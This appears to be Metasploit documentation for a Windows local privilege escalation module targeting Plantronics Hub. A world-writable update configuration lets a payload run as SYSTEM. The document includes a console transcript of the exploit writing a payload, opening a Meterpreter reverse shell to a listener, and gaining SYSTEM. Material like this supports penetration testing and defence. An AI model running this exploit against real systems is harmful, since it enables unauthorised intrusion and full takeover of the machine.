Files
metasploit-gs/documentation/modules/exploit/windows/local/plantronics_hub_spokesupdateservice_privesc.md
T

2.2 KiB

Description

The Plantronics Hub client application for Windows makes use of an automatic update service SpokesUpdateService.exe which automatically executes a file specified in the MajorUpgrade.config configuration file as SYSTEM. The configuration file is writable by all users by default.

Vulnerable Application

This module has been tested successfully on Plantronics Hub version 3.13.2 on Windows 7 SP1 (x64).

Verification Steps

  1. Start msfconsole
  2. Get a session
  3. use exploit/windows/local/plantronics_hub_spokesupdateservice_privesc
  4. set SESSION <SESSION>
  5. check
  6. run
  7. You should get a new SYSTEM session

Options

SESSION

Which session to use, which can be viewed with sessions

WritableDir

A writable directory file system path. (default: %TEMP%)

Scenarios

Windows 7 SP1 (x64)

msf5 > use exploit/windows/local/plantronics_hub_spokesupdateservice_privesc
msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > set session 1
session => 1
msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > set verbose true
verbose => true
msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > check
[*] The service is running, but could not be validated.
msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Writing payload to C:\Users\test\AppData\Local\Temp\MuVtxrl9.exe ...
[*] Writing configuration file to C:\ProgramData\Plantronics\Spokes3G\MajorUpgrade.config ...
[*] Sending stage (180291 bytes) to 172.16.191.242
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.242:49431) at 2020-01-03 14:55:46 -0500
[-] Failed to delete C:\Users\test\AppData\Local\Temp\MuVtxrl9.exe: stdapi_fs_delete_file: Operation failed: Access is denied.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >